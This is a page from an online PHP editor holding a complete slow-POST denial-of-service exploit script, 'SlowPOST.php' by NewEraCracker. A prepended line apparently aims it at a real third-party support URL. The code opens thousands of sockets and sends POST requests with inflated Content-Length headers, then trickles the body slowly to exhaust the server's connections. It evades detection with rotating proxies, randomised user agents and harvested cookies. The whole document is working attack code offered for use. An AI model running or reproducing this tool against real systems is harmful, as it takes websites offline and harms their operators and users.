Online PHP editor | output for XcnaB

<?php set_time_limit(0); ignore_user_abort(true); $_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/'; ?><?php /** * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v1.9.2] * * Date: 13.05.2013 * Author: NewEraCracker * License: Public Domain * * How to run using php command line: * Linux : php-cli SlowPOST.php * Windows : php SlowPOST.php * * This exploit might expose your IP Address in server logs. Be aware. */ //------------------------- // CONFiG //------------------------- $CONFIG['max_cookies'] = 20; $CONFIG['max_sockets'] = 9001; $CONFIG['timeout_ms'] = 500; $CONFIG['usleep_time'] = 10; //------------------------- // INiT //------------------------- // Define EXPLOIT_VERSION if(!defined('EXPLOIT_VERSION')) define('EXPLOIT_VERSION', 'v1.9.2'); // Define STDIN if(!defined('STDIN')) define('STDIN', fopen('php://stdin', 'r')); // Check SAPI if(PHP_SAPI != 'cli') { echo 'This script is not meant to be ran via browser.'; exit(1); } // Check PHP Version if(version_compare(PHP_VERSION, '5.0.4') < 0) { echo 'This support only supports PHP 5.0.4 and higher.'; exit(1); } // Globals - DO NOT EDIT $global_proxy_array = array(); //------------------------- // FUNCTiONS FOR THE LULZ //------------------------- /** Read STDIN and return it */ function readSTDIN() { $file = STDIN; if(!$file) return false; return trim(fgets($file)); } /** Receive a filename that has proxies listed in it and fills the $global_proxy_array */ function proxyLoadFile($filename) { global $global_proxy_array; // Load proxy list file $filename = str_replace('\\', '/', $filename); $content = @file_get_contents($filename); if(!$filename || !$content) { echo $filename.' is not a valid proxy-list file!'; exit(1); } $content = str_replace(array("\r\n", "\r"), "\n", $content); $content = explode("\n", $content); // Grab the proxies foreach($content as $value) { $tmp = explode(':', $value); if(isset($tmp[0], $tmp[1])) { $tmp[0] = trim($tmp[0]); $tmp[1] = (int)(trim($tmp[1])); // The proxy $global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]); } } } /** Returns a random a proxy */ function proxyGetRandom() { global $global_proxy_array; // Give a random proxy if(count($global_proxy_array)) { $proxy = null; while(!$proxy) { $rand = mt_rand(0, count($global_proxy_array) - 1); $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null); } return $proxy; } return false; } /** Returns a random useragent */ function randomUserAgent() { // Microsoft Windows versions $os = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2'); // Select a random version $os = $os[mt_rand(0, count($os) - 1)]; // Select a random browser if(mt_rand(0, 1)) { // Internet Explorer versions $ua[0] = array('4.0', '7.0', '4.0'); $ua[1] = array('4.0', '8.0', '4.0'); $ua[2] = array('5.0', '9.0', '5.0'); $ua[3] = array('5.0', '10.0', '6.0'); // Random IE $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})"; } else { // Mozilla Firefox versions $ua = array('17.0', '18.0', '19.0', '20.0', '21.0'); // Random FF $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}"; } } /** Opens a custom socket and returns it */ function openCustomSocket($newEraUrl, $newEraProxy = null) { global $CONFIG; @ini_set('default_socket_timeout', 1); $newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy); $host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name; $fp = @fsockopen($host, $newEraConnection->port); if(!$fp) return false; stream_set_blocking($fp, 0); stream_set_timeout($fp, 0, $CONFIG['timeout_ms']); return $fp; } /** * Receives a socket and performs the start of a slowPosting * Returns Content-Length on success and false on failure */ function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) { // Check the socket if(!$sock) return false; // Generate a random Content-Length $length = mt_rand(1337, 133700); // Build $header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n"; $header .= 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : ''; $header .= ($cookie ? "Cookie: {$cookie}\r\n" : ''); $header .= 'Content-Length: '.$length."\r\n"; $header .= "\r\n"; // Do it @fwrite($sock, $header); return $length; } /** Receives a socket and continues the slowPosting */ function slowPostContinue($sock, $bytes = 5) { global $CONFIG; // Check the socket if(!$sock) return false; // Check the $bytes if(intval($bytes) != $bytes) $bytes = 5; // Throttle execution speed slightly if($CONFIG['usleep_time'] > 0) @usleep($CONFIG['usleep_time']); // Do it :D $tmp = ''; for($j = 0; $j < $bytes; $j++) $tmp .= chr(mt_rand(33, 126)); @fwrite($sock, urlencode($tmp)); return true; } //------------------------- // CLASSES FOR THE LULZ //------------------------- /** I want cookies! Give me cookies! */ class NewEraCookies { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output); } /** Object updater */ public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->max_cookies = $max_cookies; $this->cookies = array(); if($output) echo PHP_EOL.'BUILDING COOKIES '; for($i = 0; $i < $this->max_cookies; $i++) { // Using Proxy file? if($proxyFile) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxyFile.' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy); if($output) echo '.'; } } /** Returns a cookie by its index */ public function returnCookieByIndex($idx) { if($idx == 'random') $idx = mt_rand(0, $this->max_cookies - 1); if(isset($this->cookies[$idx])) return $this->cookies[$idx]; return ''; } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(preg_match('/^Set-Cookie: /i', $line)) { $line = preg_replace('/^Set-Cookie: /i', '', trim($line)); $csplit = explode(';', $line); $cdata = array(); $grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) { $cdata[$cinfo[0]] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy = null) { // Build connection header $header = 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; // Check proxy url if($newEraProxy) { // Enable proxy $proxy_url = $newEraProxy->full_url; $request_fulluri = true; } else { // Disable proxy $proxy_url = ''; $request_fulluri = false; } // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => 'GET', 'timeout' => (3), 'header' => $header, 'proxy' => $proxy_url, 'request_fulluri' => $request_fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ) )); // Let the fun begin $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, $context); // I hope this does work if($handle) { // If it worked, we grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); // Fun is only at a small distance @fclose($handle); } return $cookie; } } /** Class to construct and handle an url-like object */ class NewEraUrl { private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($host_full_url) { $this->update_object($host_full_url); } /** Object updater */ public function update_object($host_full_url) { $this->host_full_url = $host_full_url; $this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false); $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); // Grab other parameters $host_full_url = explode('/', $host_full_url, 4); $host_full_url[2] = explode(':', $host_full_url[2], 2); // Host, Port, Path $this->host_name = $host_full_url[2][0]; $this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = '/'.(isset($host_full_url[3]) ? $host_full_url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(isset($this->{$var})) return $this->{$var}; } /** Quick check to see if url is minimally valid */ public static function isValid($host_full_url) { if(strpos($host_full_url, 'https://') === 0 || strpos($host_full_url, 'http://') === 0) return true; } } /** Class to construct and handle a proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_protocol; private $proxy_ssl; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($proxy_full_url) { $this->update_object($proxy_full_url); } /** Object updater */ public function update_object($proxy_full_url) { $this->proxy_full_url = $proxy_full_url; $this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false); $this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp'); // Grab other parameters if(false !== ($tmp = strpos($proxy_full_url, '://'))) $proxy_full_url = substr($proxy_full_url, $tmp + 3); $proxy_full_url = explode(':', $proxy_full_url); // Host, Port, Path $this->proxy_name = $proxy_full_url[0]; $this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80')); } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(isset($this->{$var})) return $this->{$var}; } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| "; echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; // Fetch the URL to attack $url = null; if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1])) $url = $_SERVER['argv'][1]; // Fetch proxy to use $proxy['host'] = null; $proxy['port'] = null; $proxy['file'] = false; if(!empty($url) && isset($_SERVER['argv'][2])) { if($proxy = explode(':', $_SERVER['argv'][2])) { if(isset($proxy[0], $proxy[1])) { $proxy['file'] = false; $proxy['host'] = $proxy[0]; $proxy['port'] = (int)($proxy[1]); unset($proxy[0], $proxy[1]); } } if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) { $proxy['file'] = true; $proxy['filename'] = $_SERVER['argv'][2]; } } // Ask for proxy if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) { $proxy['use'] = null; while(!$proxy['use']) { echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: '; $proxy['use'] = readSTDIN(); if(strpos(strtolower($proxy['use']), 'n') === 0) { break; } elseif(strpos(strtolower($proxy['use']), 'y') === 0) { echo PHP_EOL.'Proxy IP: '; $proxy['host'] = readSTDIN(); echo PHP_EOL.'Proxy Port: '; $proxy['port'] = (int)(readSTDIN()); } elseif(strpos(strtolower($proxy['use']), 'f') === 0) { echo PHP_EOL.'Proxy file: '; $proxy['filename'] = readSTDIN(); if(is_readable($proxy['filename'])) { $proxy['file'] = true; } else { echo PHP_EOL.'Invalid file!'.PHP_EOL; $proxy['use'] = null; } } else { $proxy['use'] = null; echo PHP_EOL.'Invalid choice!'.PHP_EOL; } } unset($proxy['use']); } // Ask for target URL while(!$url) { echo PHP_EOL.'Target url: '; $url = readSTDIN(); if(NewEraUrl::isValid($url)) break; $url = null; echo PHP_EOL.'Invalid target!'.PHP_EOL; } // Init proxy suport if(empty($proxy['host']) || empty($proxy['port'])) { $newEraProxy = null; if(!empty($proxy['file'])) { proxyLoadFile($proxy['filename']); $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']); } } else { $newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']); } // Init the others $newEraUrl = new NewEraUrl($url); $newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true); // Start echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; $fp = array(); // Do it while(1) { for($i = 0; $i < $CONFIG['max_sockets']; $i++) { // Using Proxy file? if($proxy['file']) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } // Open a new socket $tmp = array(); if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) { // Progress bar echo '.'; // Start a new slowPost and find its length if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) { if(isset($fp[$i], $fp[$i]['sock'])) { // Close connection in the global socket array if it is being used @fclose($fp[$i]['sock']); unset($fp[$i]); } // Save the new socket in the global socket array $fp[$i] = $tmp; } else { // Epic fail? @fclose($tmp['sock']); } } unset($tmp); // Check the current sockets foreach($fp as $k => $v) { if($fp[$k]['length'] > 0) { // Contine old slowPosts $tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5; slowPostContinue($fp[$k]['sock'], $tmp); $fp[$k]['length'] -= $tmp; } else { // Close completed slowPosts @fclose($fp[$k]['sock']); unset($fp[$k]); } } } } ?>